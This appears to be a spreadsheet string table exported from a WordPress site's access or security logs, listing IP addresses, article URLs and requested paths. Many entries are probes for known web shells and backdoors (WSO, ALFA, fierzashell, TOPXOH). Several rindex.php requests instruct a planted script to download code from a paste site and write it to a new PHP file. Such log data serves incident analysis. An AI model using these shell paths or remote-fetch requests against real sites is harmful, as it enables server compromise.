    <t>206.189.86.20</t>
  </si>
  <si>
    <t>20.219.15.26</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dzguckrq.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rsnyqmku.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>106.196.21.77</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Ashwitha%204%20Real</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Dilsha%20Prasannan</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/kadambari/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Donal%20Bisht</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Sophie%20Dee</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Carlotta%20Champagne</t>
  </si>
  <si>
    <t>106.196.27.62</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Malavika%20Mohanan&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/nibedita-paal/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/mimi-bhattacharjee/</t>
  </si>
  <si>
    <t>152.57.232.168</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Dimple%20Hayathi&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>150.129.148.252</t>
  </si>
  <si>
    <t>158.195.201.173</t>
  </si>
  <si>
    <t>45.138.16.21</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Bhanusri%20Mehra</t>
  </si>
  <si>
    <t>143.198.214.229</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/my-account</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/nikita-sharma/</t>
  </si>
  <si>
    <t>103.5.133.8</t>
  </si>
  <si>
    <t>152.58.147.225</t>
  </si>
  <si>
    <t>175.44.42.90</t>
  </si>
  <si>
    <t>http://www.madisonclothingny.com/</t>
  </si>
  <si>
    <t>103.225.132.227</t>
  </si>
  <si>
    <t>49.37.133.176</t>
  </si>
  <si>
    <t>51.222.137.144</t>
  </si>
  <si>
    <t>82.165.244.48</t>
  </si>
  <si>
    <t>202.8.117.66</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Chandrika%20Passionica%201</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/exeueatn.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rwvdxfpl.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/wso112233.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ccx/</t>
  </si>
  <si>
    <t>128.140.12.198</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=vrhujneyfq.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>162.55.172.55</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=zcuqhuwwqo.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>142.132.177.124</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=muhcxxrqha.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>184.54.175.204</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=abfrupnloy.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>20.219.2.242</t>
  </si>
  <si>
    <t>141.0.9.148</t>
  </si>
  <si>
    <t>71.201.207.113</t>
  </si>
  <si>
    <t>176.199.208.57</t>
  </si>
  <si>
    <t>https://maps-generator.com/</t>
  </si>
  <si>
    <t>143.198.82.44</t>
  </si>
  <si>
    <t>175.44.42.141</t>
  </si>
  <si>
    <t>http://www.chomexun.com/</t>
  </si>
  <si>
    <t>198.235.24.6</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/xl2023.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/xl2023.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimization/mwnvycfxjb.php?x=ooo</t>
  </si>
  <si>
    <t>103.143.146.176</t>
  </si>
  <si>
    <t>43.243.212.4</t>
  </si>
  <si>
    <t>139.59.229.93</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/blog/wp-admin/includes/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/site/wp-admin/includes/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wordpress/wp-admin/includes/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp/wp-admin/includes/</t>
  </si>
  <si>
    <t>159.223.49.95</t>
  </si>
  <si>
    <t>151.80.35.213</t>
  </si>
  <si>
    <t>106.196.17.225</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/%E0%B2%B8%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%B0%E0%B2%BF%E0%B2%B6%E0%B3%8D/</t>
  </si>
  <si>
    <t>206.189.33.229</t>
  </si>
  <si>
    <t>20.246.104.0</t>
  </si>
  <si>
    <t>205.210.31.174</t>
  </si>
  <si>
    <t>138.197.170.20</t>
  </si>
  <si>
    <t>146.190.106.133</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/xl2023.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/bala.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wso112233.php</t>
  </si>
  <si>
    <t>80.76.51.29</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimization/vksurusxko.php?x=ooo</t>
  </si>
  <si>
    <t>103.253.147.80</t>
  </si>
  <si>
    <t>183.136.225.45</t>
  </si>
  <si>
    <t>194.26.192.189</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wbtduqgo.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qklacdwk.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/w0rdpr3ssnew/wp-login.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/TOPXOH/OH.php</t>
  </si>
  <si>
    <t>62.210.10.186</t>
  </si>
  <si>
    <t>195.154.56.160</t>
  </si>
  <si>
    <t>https://68.178.148.82:443/</t>
  </si>
  <si>
    <t>114.119.144.51</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/allgallery/Adeline%20Castelino/2.jpg</t>
  </si>
  <si>
    <t>http://rqsaar.footstreaming.biz/mexico-andrea-mesa-crowned-miss-universe-2021</t>
  </si>
  <si>
    <t>223.233.80.237</t>
  </si>
  <si>
    <t>52.172.235.247</t>
  </si>
  <si>
    <t>175.44.42.11</t>
  </si>
  <si>
    <t>http://www.nfocusdriver.com/</t>
  </si>
  <si>
    <t>4.224.42.115</t>
  </si>
  <si>
    <t>106.196.16.90</t>
  </si>
  <si>
    <t>192.82.58.190</t>
  </si>
  <si>
    <t>147.78.47.230</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?dumpmecheck=1</t>
  </si>
  <si>
    <t>http://www.facebook.net/</t>
  </si>
  <si>
    <t>205.210.31.156</t>
  </si>
  <si>
    <t>136.226.243.13</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ioptimization/xanvbypszn.php?x=ooo</t>
  </si>
  <si>
    <t>https://sandesh711.com/ms-admin.php</t>
  </si>
  <si>
    <t>45.154.98.15</t>
  </si>
  <si>
    <t>157.45.178.226</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-essay/kannada-essay-namma-kere-nammura-kere-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%AC%E0%B2%82%E0%B2%A7-%E0%B2%A8%E0%B2%AE%E0%B3%8D%E0%B2%AE-%E0%B2%95%E0%B3%86/</t>
  </si>
  <si>
    <t>106.79.196.111</t>
  </si>
  <si>
    <t>106.79.196.214</t>
  </si>
  <si>
    <t>106.79.196.179</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/TOPXOH/wDR.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/w0rdpr3ssnew/wp-login.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/TOPXOH/OH.php</t>
  </si>
  <si>
    <t>20.125.117.109</t>
  </si>
  <si>
    <t>117.194.54.105</t>
  </si>
  <si>
    <t>175.44.42.154</t>
  </si>
  <si>
    <t>http://www.darulathar.com/</t>
  </si>
  <si>
    <t>78.142.63.239</t>
  </si>
  <si>
    <t>185.106.213.196</t>
  </si>
  <si>
    <t>https://sandesh711.com/chtmlfuns.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/anveshi-jain-gandi-baat-2-actress/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/2020/06/cropped-Screenshot_20200606-143501-01-2-237x300.jpeg?v=1600437802</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/2020/08/images-1.jpeg?v=1600437765</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/page/7/</t>
  </si>
  <si>
    <t>Column1</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>view_all.php?name=Veronica%20Perasso</t>
  </si>
  <si>
    <t>ss.php</t>
  </si>
  <si>
    <t>tag/sofia-ansari/</t>
  </si>
  <si>
    <t>category/indian-serial-actress/</t>
  </si>
  <si>
    <t>amp/</t>
  </si>
  <si>
    <t>viewup.php?name=Dhivya%20Duraisamy&amp;date=2023-12-26</t>
  </si>
  <si>
    <t>view_all.php?name=Style%20With%20Plixxi</t>
  </si>
  <si>
    <t>viewupdate.php</t>
  </si>
  <si>
    <t>viewup.php?name=Vaibhavi%20Joshi%20777&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>leaderboard.php</t>
  </si>
  <si>
    <t>viewup.php?name=Aditi%20Mistry%202607&amp;date=2023-05-16</t>
  </si>
  <si>
    <t>wp-content/themes/seotheme/db.php?u</t>
  </si>
  <si>
    <t>yoohslwv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-plain.php</t>
  </si>
  <si>
    <t>yosurgpt.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>alfacgiapi/perl.alfa</t>
  </si>
  <si>
    <t>ALFA_DATA/alfacgiapi/perl.alfa</t>
  </si>
  <si>
    <t>viewup.php?name=Neha%20Saha&amp;date=2023-09-16</t>
  </si>
  <si>
    <t>pjwfyqlf.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>viewup.php?name=Rimpi%2031&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>wp-term.php</t>
  </si>
  <si>
    <t>wp-ver.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-ver.php</t>
  </si>
  <si>
    <t>view_all.php</t>
  </si>
  <si>
    <t>actress-anchors-models/rasha-kirmani-a-rising-star-in-the-world-of-dance-and-expression/</t>
  </si>
  <si>
    <t>wxxlsett.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>hindi-serial-actress/actors-and-actresses-who-rose-to-stardom-via-ott-platforms/</t>
  </si>
  <si>
    <t>actress-anchors-models/trending-saree-fashion-on-instagram/</t>
  </si>
  <si>
    <t>tag/body-positivity/</t>
  </si>
  <si>
    <t>view.php?name=Ruhi%20Singh%2012</t>
  </si>
  <si>
    <t>view_all.php?name=Sureet%20Kular</t>
  </si>
  <si>
    <t>wp-content/plugins/rss-feed-post-generator-echo/readme.txt</t>
  </si>
  <si>
    <t>wp-content/themes/wp-pridmag/up.php</t>
  </si>
  <si>
    <t>viewup.php?name=Malavika%20Mohanan&amp;date=2023-11-14</t>
  </si>
  <si>
    <t>view.php?name=Eva%20Lovia</t>
  </si>
  <si>
    <t>viewup.php</t>
  </si>
  <si>
    <t>viewup.php?name=Bhumi%20Pednekar%20&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>kannada-movies/%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1%E0%B2%A6%E0%B2%B2%E0%B3%8D%E0%B2%B2%E0%B2%BF-%E0%B2%85%E0%B2%B5%E0%B2%95%E0%B2%BE%E0%B2%B6-%E0%B2%B5%E0%B2%82%E0%B2%9A%E0%B2%BF%E0%B2%A4-%E0%B2%AA/</t>
  </si>
  <si>
    <t>tag/sruthy-renjith-vaiga/</t>
  </si>
  <si>
    <t>themes.php</t>
  </si>
  <si>
    <t>?v=1</t>
  </si>
  <si>
    <t>actress-anchors-models/embracing-diversity-the-rise-of-plus-size-models-on-instagram/</t>
  </si>
  <si>
    <t>view.php?name=Samyuktha%20Menon</t>
  </si>
  <si>
    <t>kannada-movies/leonilla-shwetha-dsouza-looks-to-be-a-promising-actress/</t>
  </si>
  <si>
    <t>wp-content/themes/jaida/lang.php</t>
  </si>
  <si>
    <t>wp-content/themes/travel/issue.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-help/mini.php</t>
  </si>
  <si>
    <t>wp-content/plugins/fix/up.php</t>
  </si>
  <si>
    <t>wp-content/plugins/shell/about.php</t>
  </si>
  <si>
    <t>kannada-essay/%E0%B2%A7%E0%B2%B0%E0%B3%86%E0%B2%AF-%E0%B2%A8%E0%B2%97%E0%B3%81/</t>
  </si>
  <si>
    <t>actress-anchors-models/top-telugu-tv-anchors-of-present-time-who-captivate-audiences-with-their-charisma-and-energy/</t>
  </si>
  <si>
    <t>wp-content/plugins/jupiterx-core/readme.txt</t>
  </si>
  <si>
    <t>wp-content/plugins/charitable/readme.txt</t>
  </si>
  <si>
    <t>?author=3</t>
  </si>
  <si>
    <t>ayofjrkm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>txdszrvc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>mgpajkel.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>kkuzggjv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/plugins/learnpress/readme.txt</t>
  </si>
  <si>
    <t>privacy-policy/</t>
  </si>
  <si>
    <t>tag/stylewithplixxi/</t>
  </si>
  <si>
    <t>actress-anchors-models/%E0%B2%B0%E0%B2%AE%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%AA%E0%B2%B8%E0%B3%81%E0%B2%AA%E0%B3%81%E0%B2%B2%E0%B3%87%E0%B2%9F%E0%B2%BF-%E0%B2%85%E0%B2%B5%E0%B2%B0-%E0%B2%A6%E0%B3%8A%E0%B2%A1%E0%B3%8D/</t>
  </si>
  <si>
    <t>science/charles-herbert-best/</t>
  </si>
  <si>
    <t>actress-anchors-models/sharwari-gujar-and-archana-gujar-the-dynamic-fitness-enthusiast-mom-and-daughter-duo/</t>
  </si>
  <si>
    <t>freedom-fighters/freedom-fighter-sanjeevnath-aikala/</t>
  </si>
  <si>
    <t>tag/lakshmi-rai/</t>
  </si>
  <si>
    <t>tag/ashlesha-savant/</t>
  </si>
  <si>
    <t>tag/prajakta/</t>
  </si>
  <si>
    <t>tag/roma-varadkar/</t>
  </si>
  <si>
    <t>category/kannada-serial-actress/</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-catcher/</t>
  </si>
  <si>
    <t>tag/swetha-changappa/</t>
  </si>
  <si>
    <t>tag/style-with-plixxi/</t>
  </si>
  <si>
    <t>tag/chandini-tamilarasan/</t>
  </si>
  <si>
    <t>tag/inaya-sultana/</t>
  </si>
  <si>
    <t>crypto/what-is-bitcoin/</t>
  </si>
  <si>
    <t>tag/wamiqa-gabbi/</t>
  </si>
  <si>
    <t>tag/madhuri-braganza/</t>
  </si>
  <si>
    <t>tag/1920-bollywood-movie/</t>
  </si>
  <si>
    <t>tag/mukesh-gahlot/</t>
  </si>
  <si>
    <t>tag/mukhota-dance/</t>
  </si>
  <si>
    <t>incredible-india/different-dance-forms-in-india/</t>
  </si>
  <si>
    <t>actress-anchors-models/famous-splitsvilla-contenstants/</t>
  </si>
  <si>
    <t>tag/anasuya-bharadwaj/</t>
  </si>
  <si>
    <t>kannada-movies/kannada-actresses-who-did-not-get-many-opportunities-in-kannada-films-but-gained-fame-and-success-in-other-languages/</t>
  </si>
  <si>
    <t>tag/rashi-modi/</t>
  </si>
  <si>
    <t>actress-anchors-models/why-did-adah-sharma-not-get-many-chances-in-bollywood/</t>
  </si>
  <si>
    <t>tag/bigg-boss-8-kannada/</t>
  </si>
  <si>
    <t>bmicsxty.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>zmcwzcnl.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wordpress/wp-admin/setup-config.php?step=1</t>
  </si>
  <si>
    <t>old/wp-admin/setup-config.php?step=1</t>
  </si>
  <si>
    <t>tag/sucheta-dutta/</t>
  </si>
  <si>
    <t>view.php?name=Shubha%20Poonja</t>
  </si>
  <si>
    <t>wp-content/plugins/simple/simple.php</t>
  </si>
  <si>
    <t>tag/ulidavaru-kandante/</t>
  </si>
  <si>
    <t>tag/rakulpreet-singh/</t>
  </si>
  <si>
    <t>style.php</t>
  </si>
  <si>
    <t>b0.php</t>
  </si>
  <si>
    <t>.well-known/pki-validation/x.php</t>
  </si>
  <si>
    <t>.well-known/fierzashell.php</t>
  </si>
  <si>
    <t>tag/vainidhi-jagdish/</t>
  </si>
  <si>
    <t>category/hindi-serial-actress/</t>
  </si>
  <si>
    <t>actress-anchors-models/body-positivity-influencers-who-are-redefining-beauty-standards/</t>
  </si>
  <si>
    <t>fitness-and-nutrition/top-5-supplements-to-gain-lean-muscle-mass/</t>
  </si>
  <si>
    <t>actress-anchors-models/top-10-roadies-contestants-of-all-time/</t>
  </si>
  <si>
    <t>tag/kannada-serial-actress/</t>
  </si>
  <si>
    <t>viewup.php?name=Antra&amp;date=2023-11-29</t>
  </si>
  <si>
    <t>viewup.php?name=Ushasi&amp;date=2024-07-24</t>
  </si>
  <si>
    <t>xiwsztat.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>mpersyic.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>kannada-movies/%E0%B2%AD%E0%B3%82%E0%B2%AE%E0%B2%BF%E0%B2%95%E0%B2%BE-%E0%B2%B6%E0%B3%86%E0%B2%9F%E0%B3%8D%E0%B2%9F%E0%B2%BF-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%A8%E0%B2%9F%E0%B2%BF-%E0%B2%AC/</t>
  </si>
  <si>
    <t>tamil-movies/%E0%B2%AC%E0%B3%86%E0%B2%9F%E0%B3%8D%E0%B2%9F%E0%B2%BF%E0%B2%82%E0%B2%97%E0%B3%8D-%E0%B2%86%E0%B2%AA%E0%B3%8D-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%95%E0%B2%B0%E0%B2%A3%E0%B2%A6%E0%B2%B2%E0%B3%8D%E0%B2%B2/</t>
  </si>
  <si>
    <t>category/updates/</t>
  </si>
  <si>
    <t>view.php?name=Suriya+Praba</t>
  </si>
  <si>
    <t>actress-anchors-models/body-positivity-influencers/</t>
  </si>
  <si>
    <t>hehehehe.php</t>
  </si>
  <si>
    <t>viewup.php?name=Dounia&amp;date=2024-06-05</t>
  </si>
  <si>
    <t>tag/%E0%B2%95%E0%B3%8D%E0%B2%AF%E0%B2%BE%E0%B2%82%E0%B2%A1%E0%B2%BF%E0%B2%B8%E0%B3%8D-%E0%B2%B9%E0%B2%AB%E0%B3%80%E0%B2%A8%E0%B3%8D/</t>
  </si>
  <si>
    <t>inputs.php</t>
  </si>
  <si>
    <t>wp-admin/inputs.php</t>
  </si>
  <si>
    <t>?author=2</t>
  </si>
  <si>
    <t>author/admin/</t>
  </si>
  <si>
    <t>wp-admin/wp-ldd.php?a=c</t>
  </si>
  <si>
    <t>wp-admin/wp-add.php?a=c</t>
  </si>
  <si>
    <t>wp-ldd.php?a=c</t>
  </si>
  <si>
    <t>wp-add.php?a=c</t>
  </si>
  <si>
    <t>viewup.php?name=Ridhi%20Dogra&amp;date=2023-12-22</t>
  </si>
  <si>
    <t>simple.php</t>
  </si>
  <si>
    <t>viewup.php?name=Jennifer%20Marie%20Model&amp;date=2023-11-30</t>
  </si>
  <si>
    <t>wp-content/inputs.php</t>
  </si>
  <si>
    <t>zdulokcx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>ooeyowjr.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>view_all.php?name=Surekha%20Vani</t>
  </si>
  <si>
    <t>view_all.php?name=Khushi%20Mukherjee</t>
  </si>
  <si>
    <t>oqqaehvg.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wfqfowyy.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>2024/08/</t>
  </si>
  <si>
    <t>bollywood-movies/best-irrfan-khan-movies-to-not-miss/</t>
  </si>
  <si>
    <t>2024/06/</t>
  </si>
  <si>
    <t>general.php?pd=1&amp;mapname=ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>sample.php?pd=1&amp;mapname=ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>wp-aa.php</t>
  </si>
  <si>
    <t>wp-content/plugins/background-image-cropper/ups.php</t>
  </si>
  <si>
    <t>viewup.php?name=Malvika%20Sharma&amp;date=2023-03-15</t>
  </si>
  <si>
    <t>uncategorized/the-influence-of-new-age-talents-in-kannada-cinema-raj-b-shetty-rakshit-shetty-and-rishab-shetty/</t>
  </si>
  <si>
    <t>wp-includes/widgets/include.php</t>
  </si>
  <si>
    <t>wp-includes/images/include.php</t>
  </si>
  <si>
    <t>wp-content/plugins/core-plugin/include.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-theme-editor/include.php</t>
  </si>
  <si>
    <t>view.php?name=Sruthi%20Hariharan</t>
  </si>
  <si>
    <t>mah.php</t>
  </si>
  <si>
    <t>view.php?name=Sunayana%20Fozdar</t>
  </si>
  <si>
    <t>?of=1</t>
  </si>
  <si>
    <t>chosen.php</t>
  </si>
  <si>
    <t>wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>tag/leonilla-shwetha-dsouza/</t>
  </si>
  <si>
    <t>wp-content/plugins/download-plugin/wp-access.php</t>
  </si>
  <si>
    <t>jp.php</t>
  </si>
  <si>
    <t>edit.php</t>
  </si>
  <si>
    <t>dropdown.php</t>
  </si>
  <si>
    <t>about.php</t>
  </si>
  <si>
    <t>admin.php</t>
  </si>
  <si>
    <t>link.php</t>
  </si>
  <si>
    <t>wp-content/plugins/WordPressCore/include.php</t>
  </si>
  <si>
    <t>index/function.php</t>
  </si>
  <si>
    <t>telugu-movies/%E0%B2%86%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%B0%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%A6%E0%B3%87%E0%B2%B6-%E0%B2%9A%E0%B2%BF%E0%B2%A8%E0%B3%8D%E0%B2%A8-%E0%B2%95%E0%B2%B3%E0%B3%8D%E0%B2%B3%E0%B2%A4/</t>
  </si>
  <si>
    <t>idqxkvwj.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>ytsaefhm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/plugins/essential-addons-for-elementor-lite/readme.txt</t>
  </si>
  <si>
    <t>admin/uploads/images/</t>
  </si>
  <si>
    <t>wp-admin/meta/</t>
  </si>
  <si>
    <t>admin/images/slider/</t>
  </si>
  <si>
    <t>admin/fckeditor/editor/filemanager/</t>
  </si>
  <si>
    <t>sites/default/files/</t>
  </si>
  <si>
    <t>admin/controller/extension/extension/</t>
  </si>
  <si>
    <t>modules/mod_simplefileuploadv1.3/elements/</t>
  </si>
  <si>
    <t>components/</t>
  </si>
  <si>
    <t>wp-includes/random_compat/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Auth/</t>
  </si>
  <si>
    <t>wp-includes/Text/Diff/Engine/Engine/</t>
  </si>
  <si>
    <t>wp-includes/images/wlw/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Exception/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Exception/HTTP/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Utility/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Response/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Transport/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Proxy/</t>
  </si>
  <si>
    <t>wp-includes/Requests/Cookie/</t>
  </si>
  <si>
    <t>php/</t>
  </si>
  <si>
    <t>Assets/</t>
  </si>
  <si>
    <t>images/stories/</t>
  </si>
  <si>
    <t>plugins/</t>
  </si>
  <si>
    <t>system/</t>
  </si>
  <si>
    <t>template/</t>
  </si>
  <si>
    <t>shop/</t>
  </si>
  <si>
    <t>files/</t>
  </si>
  <si>
    <t>admin/editor/</t>
  </si>
  <si>
    <t>include/</t>
  </si>
  <si>
    <t>assets/images/</t>
  </si>
  <si>
    <t>Public/</t>
  </si>
  <si>
    <t>vendor/</t>
  </si>
  <si>
    <t>local/</t>
  </si>
  <si>
    <t>modules/</t>
  </si>
  <si>
    <t>Site/</t>
  </si>
  <si>
    <t>images/</t>
  </si>
  <si>
    <t>assets/</t>
  </si>
  <si>
    <t>vendor/phpunit/phpunit/src/Util/PHP/</t>
  </si>
  <si>
    <t>upload/image/</t>
  </si>
  <si>
    <t>ALFA_DATA/</t>
  </si>
  <si>
    <t>.well-knownold/</t>
  </si>
  <si>
    <t>uploads/</t>
  </si>
  <si>
    <t>upload/</t>
  </si>
  <si>
    <t>admin/uploads/</t>
  </si>
  <si>
    <t>Admin/uploads/</t>
  </si>
  <si>
    <t>wp-content/themes/classic/inc/</t>
  </si>
  <si>
    <t>wp-content/plugins/ninja-forms/</t>
  </si>
  <si>
    <t>wp-content/mu-plugins-old/</t>
  </si>
  <si>
    <t>Mshell.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/atomlib.php</t>
  </si>
  <si>
    <t>woh.php</t>
  </si>
  <si>
    <t>view_all.php?name=Neha%20Saha</t>
  </si>
  <si>
    <t>kannada-movies/exploring-the-journey-of-yaana-a-kannada-cinematic-gem/</t>
  </si>
  <si>
    <t>tag/stylewithplixxi-real-name/</t>
  </si>
  <si>
    <t>china.php</t>
  </si>
  <si>
    <t>actress-anchors-models/updates-17-june-2024/</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-cns-product/</t>
  </si>
  <si>
    <t>wp-content/plugins/incache/</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-police-staging/</t>
  </si>
  <si>
    <t>wp-content/themes/include.php</t>
  </si>
  <si>
    <t>wp-content/plugins/include.php</t>
  </si>
  <si>
    <t>wp-content/plugins/WordPressCore-1/include.php</t>
  </si>
  <si>
    <t>view.php?name=Kajal%20Agarwal</t>
  </si>
  <si>
    <t>view.php?name=Scarlett%20M%20Rose</t>
  </si>
  <si>
    <t>view.php?name=Gayathiri%20Iyer</t>
  </si>
  <si>
    <t>kannada-movies/%e0%b2%ad%e0%b3%82%e0%b2%ae%e0%b2%bf%e0%b2%95%e0%b2%be-%e0%b2%b6%e0%b3%86%e0%b2%9f%e0%b3%8d%e0%b2%9f%e0%b2%bf-%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1-%e0%b2%a8%e0%b2%9f%e0%b2%bf-%e0%b2%ac/</t>
  </si>
  <si>
    <t>wp-content/plugins/google-seo-rank/module.php</t>
  </si>
  <si>
    <t>view.php?name=Monalisa</t>
  </si>
  <si>
    <t>wp-content/plugins/google-seo-rank/README.txt</t>
  </si>
  <si>
    <t>viewup.php?name=Trisha%20Krishnan&amp;date=2023-12-01</t>
  </si>
  <si>
    <t>view.php?name=Monami%20Ghosh</t>
  </si>
  <si>
    <t>view.php?name=Swagatha%20S%20Krishnan</t>
  </si>
  <si>
    <t>xxc.php</t>
  </si>
  <si>
    <t>wb.php</t>
  </si>
  <si>
    <t>wp-seo.php</t>
  </si>
  <si>
    <t>epinyins.php</t>
  </si>
  <si>
    <t>wp-content/plugins/x/</t>
  </si>
  <si>
    <t>cjfuns.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/license.php</t>
  </si>
  <si>
    <t>ss.php?c_c</t>
  </si>
  <si>
    <t>viewup.php?name=Sanjeeda%20Shaikh&amp;date=2023-11-04</t>
  </si>
  <si>
    <t>view_all.php?name=Shubha%20Poonja</t>
  </si>
  <si>
    <t>lrcrguni.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>cxrpcobm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/themes/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>wp-content/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>wp-admin/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>.well-known/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>wp-content/uploads/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-biocomputing-installed/</t>
  </si>
  <si>
    <t>wp-content/plugins/pwnd/pwnd.php</t>
  </si>
  <si>
    <t>www.sandesh711.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1</t>
  </si>
  <si>
